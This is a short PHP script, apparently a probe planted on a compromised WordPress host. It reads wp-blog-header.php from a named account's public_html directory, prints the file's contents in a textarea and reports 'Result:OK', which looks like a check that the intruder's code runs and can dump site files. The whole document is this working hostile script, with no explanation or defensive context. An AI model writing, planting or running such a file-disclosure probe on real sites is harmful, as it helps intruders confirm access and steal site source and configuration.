<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";if(file_exists("/home/pati454t/public_html/wp-blog-header.php")) { $txt = file_get_contents("/home/pati454t/public_html/wp-blog-header.php"); print("<textarea>$txt</textarea>"); }echo "Result:OK"; echo "</body></html>"; die;